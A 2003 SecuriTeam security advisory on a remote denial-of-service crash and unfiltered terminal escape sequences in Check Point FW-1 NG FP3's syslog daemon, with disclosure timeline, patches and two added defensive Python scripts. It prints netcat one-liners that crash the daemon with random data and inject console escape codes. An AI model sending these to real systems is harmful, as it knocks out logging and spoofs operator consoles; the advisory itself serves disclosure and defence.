[NEWS] Check Point FW-1 DoS Attack against Syslog Daemon
From: support@securiteam.com
Date: 03/23/03
From: support@securiteam.com To: list@securiteam.com Date: 23 Mar 2003 16:43:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Check Point FW-1 DoS Attack against Syslog Daemon
------------------------------------------------------------------------
SUMMARY
Two vulnerabilities have been found in the syslog daemon of Check Point FW-1.
One allows a remote denial of service against the syslog daemon of Check Point
FW-1 NG FP3 (also FP3 HF1). The other allows syslog messages containing
terminal escape sequences, directed at the syslog daemon of Check Point FW-1
NG FP3 (including HF1 and HF2), to pass through unfiltered and corrupt the
display when the log is viewed on a console.
DETAILS
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off) that
redirects syslog messages received from remote hosts (e.g. routers) into Check
Point's SmartView Tracker logging mechanism. This syslog daemon can be crashed
from remote and does not start again automatically. The watchdog service does
not detect the crash, and no entry about the unavailability of the syslog
daemon appears in SmartView Tracker.
Additionally, the daemon passes on every character received in a syslog message
from remote without modification. Escape sequences are neither filtered nor,
for example, expanded to their octal values in ASCII, as the standard syslogd
does.
1. Vulnerability: Remote DoS against the syslog daemon of Check Point FW-1 NG
FP3 (also FP3 HF1); since the daemon runs as root (see below), a remote root
exploit may also be possible.
Tested version and platform:
Check Point FW-1 NG FP3 (with or without HF1) on Red Hat Linux 7.3 running
kernel 2.4.9-34
md5sum of binary
[firewall]# md5sum /opt/CPfw1-50-03/bin/syslog
4eba3458cb05ed30dec6a75a17b0925a /opt/CPfw1-50-03/bin/syslog
Contained in:
[firewall]# rpm -qf /opt/CPfw1-50-03/bin/syslog
CPfw1-50-03
With build time:
[firewall]# rpm -q --queryformat "%{buildtime}\n" CPfw1
1032421147 (Thu 19 Sep 2002 09:39:07 AM MEST)
Note: FP3-HF1 does not update this binary.
Instructions for crashing the syslog daemon of Check Point FW-1 NG FP3:
Start the syslog daemon by enabling it in the firewall object (and running
cpstop/cpstart afterwards), or by executing it by hand:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- occurs after the random syslog payload described below
has been received
Check for listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon runs as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
Send a valid syslog message from a remote host (here also a Linux system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The syslog daemon started above should crash after a short time; use
"netstat" to see whether a daemon is still listening on UDP port 514.
Note: For a clean restart of Check Point's syslog daemon the firewall
service needs to be restarted (cpstop/cpstart).
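As an added example (not part of the advisory and not Check Point's software), a small check that closes the monitoring gap described above: because the watchdog does not notice the crash, this script parses the output of the same "netstat -lnptu" command and reports whether a process still owns UDP port 514, so it can be run from cron and alert on the dead daemon. It assumes a current Python 3 interpreter and that netstat is run as root so the PID/Program column is populated; the netstat lines embedded in it are constructed samples, not captured from a real firewall.

```python
#!/usr/bin/env python3
"""Liveness check for the FW-1 syslog daemon on UDP/514.

Added example, not part of the advisory: parses 'netstat -lnptu' output and
reports whether a process still owns the port, since neither the watchdog
nor SmartView Tracker notices when the daemon segfaults.
"""
import subprocess
import sys
from typing import Optional


def udp_listener(netstat_output: str, port: int) -> Optional[str]:
    """Return the 'pid/program' owning UDP <port>, or None if nothing listens.

    UDP rows of netstat have no State column, so the PID/Program name is taken
    from the last field rather than a fixed index; that keeps the parser right
    for both TCP and UDP rows. Without root, netstat prints '-' there, in
    which case '?' is returned: the port is bound, but the owner is unknown.
    """
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith('udp'):
            continue
        local = fields[3]                      # e.g. 0.0.0.0:514 or :::514
        if local.rsplit(':', 1)[-1] != str(port):
            continue
        owner = fields[-1]
        return owner if '/' in owner else '?'
    return None


def daemon_alive(netstat_output: str, port: int = 514,
                 program: str = 'syslog') -> bool:
    """True if <program> (or, lacking root, some process) listens on UDP <port>."""
    owner = udp_listener(netstat_output, port)
    return owner is not None and (owner == '?' or owner.endswith('/' + program))


# Constructed netstat samples (layout of the net-tools output of that era).
BEFORE_CRASH = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
udp        0      0 0.0.0.0:514             0.0.0.0:*                           2731/syslog
"""
AFTER_CRASH = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
"""

if __name__ == '__main__':
    out = subprocess.run(['netstat', '-lnptu'], capture_output=True,
                         text=True).stdout
    if daemon_alive(out):
        print('ok: syslog daemon listening on udp/514')
        sys.exit(0)
    print('CRITICAL: no syslog daemon on udp/514 (restart with cpstop; cpstart)')
    sys.exit(2)
```

Exit status 2 on failure follows the usual monitoring-plugin convention, so the script can be dropped into an existing alerting setup; the only state it needs is the netstat output, which is why the parser is a pure function that can be tested against saved samples.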
Solutions to prevent the DoS attack against the syslog service:
- Upgrade to FP3 HF2 as soon as possible; see
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html for more
information (available since 14 March 2003).
- Customize your rule set so that the enforcement module accepts syslog
messages only from dedicated (and trusted, see below) senders.
2. Vulnerability: Syslog messages containing escape sequences directed at the
syslog daemon of Check Point FW-1 NG FP3 (including HF1 and HF2) remain
unfiltered and can corrupt the display if the log is viewed on a console.
Tested version and platform:
Check Point FW-1 NG FP3 (also with HF1 or HF2) on Red Hat Linux 7.3
running kernel 2.4.9-34
Syslog messages from the network are not checked for non-printable
characters; if the log is viewed on a console, the visual output can
therefore no longer be trusted at all.
Instructions for demonstration:
Enable receiving of syslog messages from remote hosts on FW-1, e.g. as described above.
View log on console by running following command:
[firewall]# fw log -nfnl
Send some special escape sequences via syslog, e.g.
[evilhost]# echo -e "<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be scared too much for now...
Press CTRL-C and reset the console to its default state by executing:
[firewall]# reset
Attackers might send many other "special" escape sequences; for a Linux host
as destination see "man console_codes" for more.
Note: The standard syslog daemon on an RHL 7.3 system renders the same message as:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK^[[2;25m^[[22;30m^[[3q
Solutions to prevent unfiltered console output:
- Filter the log output with "tr", e.g.:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all characters with ASCII codes 0-31 and 128-255, except 10 for LF, are
replaced by '*'; note that this also replaces tabs and any 8-bit characters,
and that it only protects the viewer: the raw sequences are still stored in
the log)
- Update Check Point's syslog daemon to a newer version once again, when
available.
- Improve the rule set as suggested above.
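As an added example (not from the advisory, and not Check Point's code), a viewer-side sanitizer that does what the daemon should do before such a message reaches a console: it strips the <PRI> prefix, renders control bytes in the caret notation used by the RHL 7.3 syslogd output quoted above (^G for BEL, ^[ for ESC), renders 8-bit bytes as octal escapes, and separately lists any CSI sequences so they can be alerted on. It assumes Python 3; the two datagrams embedded in it are constructed samples (the advisory's demo payload and an invented router line).

```python
#!/usr/bin/env python3
"""Sanitize and flag raw syslog datagrams before they reach a terminal.

Added example, not part of the advisory or of Check Point's code.
"""
import re
from typing import List, Tuple

PRI_RE = re.compile(rb'^<(\d{1,3})>')
# ANSI/VT100 CSI sequence: ESC '[' parameters, intermediates, final byte.
CSI_RE = re.compile(rb'\x1b\[[0-9;?]*[ -/]*[@-~]')


def split_pri(datagram: bytes) -> Tuple[int, int, bytes]:
    """Return (facility, severity, message) of a BSD syslog datagram.

    PRI = facility * 8 + severity. A missing or out-of-range '<PRI>' is
    treated as priority 13 (user.notice), the RFC 3164 default.
    """
    m = PRI_RE.match(datagram)
    if m and int(m.group(1)) <= 191:
        pri = int(m.group(1))
        msg = datagram[m.end():]
    else:
        pri, msg = 13, datagram
    return pri // 8, pri % 8, msg


def caret_escape(raw: bytes) -> str:
    """Make every byte printable: control -> ^X, DEL -> ^?, 8-bit -> \\ooo.

    LF is kept so multi-line output still lines up. TAB is deliberately NOT
    exempted: a terminal honours it as a cursor move, just like ESC sequences.
    """
    out = []
    for b in raw:
        if b == 0x0A:
            out.append('\n')
        elif b < 0x20:
            out.append('^' + chr(b + 0x40))    # 0x07 -> ^G, 0x1B -> ^[
        elif b == 0x7F:
            out.append('^?')
        elif b >= 0x80:
            out.append('\\%03o' % b)
        else:
            out.append(chr(b))
    return ''.join(out)


def terminal_escapes(raw: bytes) -> List[str]:
    """Return the CSI sequences found in a message (empty list if none).

    Usable as a detection rule: routers and hosts never legitimately log
    cursor-control sequences, so any hit from the network is worth an alert.
    """
    return [s.decode('ascii') for s in CSI_RE.findall(raw)]


def render(datagram: bytes) -> str:
    """What a safe console viewer should print for one datagram."""
    facility, severity, msg = split_pri(datagram)
    return '%d.%d: %s' % (facility, severity, caret_escape(msg))


# Constructed sample datagrams: the advisory's demo payload and an invented
# router line in the style of a Cisco configuration-change message.
HOSTILE = (b'<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER ATTACK'
           b'\033[2;25m\033[22;30m\033[3q')
BENIGN = b'<189>20: 00:02:00: %SYS-5-CONFIG_I: Configured from console'

if __name__ == '__main__':
    for d in (HOSTILE, BENIGN):
        seqs = terminal_escapes(d)
        flag = '  <-- %d escape sequence(s)' % len(seqs) if seqs else ''
        print(render(d) + flag)
```

Compared with the "tr" one-liner above, this keeps the information (^[[2J still tells you what the attacker sent) instead of collapsing it to '*', and the same functions can be applied when the message is received rather than when it is displayed, which is where the daemon itself should have done it.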
History:
2003-01-17: Syslog crash issue detected by Dr. Peter Bieringer of AERAsec
while testing the newly introduced syslog daemon feature in FP3
2003-01-17: Create first internal summary
2003-01-17: Information about the crash sent to vendor by e-mail
2003-01-20: Extend summary to a full advisory
2003-01-23: Unofficial confirmation that information was received by vendor
2003-01-24: Official answer which confirms this issue
2003-01-28: Cosmetic review of advisory
2003-02-28: Detect problem with unfiltered console codes, notify vendor by
e-mail (no response about that problem so far)
2003-03-14: Add information about unfiltered console codes, review for
publishing
2003-03-17: Pre-final review
2003-03-20: Check Point posted an alert
2003-03-21: Final review and official announcement
2003-03-21: Add note about distribution of this advisory
2003-03-22: Fix some typos
Note: The 2 month delay between notifying vendor and public release of
this advisory was caused by an accepted request of the vendor for a delay
to avoid breaking its already running QA cycle for HF2.
Official word from Check Point:
Additional information about the vulnerability can be viewed by going to:
http://www.checkpoint.com/techsupport/alerts/syslog.html or
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
ADDITIONAL INFORMATION
The information has been provided by Dr. Peter Bieringer <pbieringer@aerasec.de>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.